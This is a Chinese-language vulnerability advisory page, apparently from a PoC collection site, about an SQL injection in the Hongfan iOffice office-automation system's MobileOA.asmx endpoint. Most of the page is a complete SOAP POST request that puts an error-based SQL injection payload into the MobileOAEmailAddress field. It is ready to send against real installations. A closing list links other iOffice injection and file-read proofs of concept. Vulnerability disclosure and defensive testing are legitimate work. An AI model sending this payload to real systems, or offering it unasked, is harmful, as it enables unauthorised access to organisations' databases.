红帆 IOffice /iOffice/prg/set/wss/MobileOA.asmx SQL 注入漏洞

日期: 2025-07-11 | 影响软件: 红帆IOffice | POC: 已公开

漏洞描述

红帆 IOffice 是一款企业办公自动化系统。该漏洞存在于 /iOffice/prg/set/wss/MobileOA.asmx 接口的 GeMrNewData 方法中，攻击者可以通过构造恶意的 SQL 语句注入参数 MobileOAEmailAddress，从而获取数据库中的敏感信息或执行其他恶意操作。

PoC代码

POST /iOffice/prg/set/wss/MobileOA.asmx HTTP/1.1
Content-Type: text/xml; charset=utf-8
Host: 

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
               xmlns:xsd="http://www.w3.org/2001/XMLSchema"
               xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <GeMrNewData xmlns="http://tempuri.org/">
      <MobileOAEmailAddress>' AND 5079 IN (SELECT (CHAR(113)+CHAR(122)+CHAR(98)+CHAR(113)+(SELECT (CASE WHEN (5079=5079) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(112)+CHAR(98)+CHAR(113)))-- eqJq</MobileOAEmailAddress>
    </GeMrNewData>
  </soap:Body>
</soap:Envelope>

漏洞描述

PoC代码

相关漏洞推荐

hongfan-ioffice-iofiledown-fileread: 红帆 iOffice ioFileDown 任意文件读取漏洞 POC

红帆 ioffice /iOffice/Identity/NetCAUserLogin.aspx SQL 注入漏洞 POC

红帆ioffice iocomGetAtt.aspx SQL注入漏洞 无POC

hongfan-iodesktopdata-sqli: 红帆iOffice ioDesktopData.asmx接口SQL注入 POC

SourceCodester Pet Grooming Management Software SQL注入漏洞 无POC

红帆ioffice iocomGetAtt.aspx SQL注入漏洞无POC

SourceCodester Pet Grooming Management Software SQL注入漏洞无POC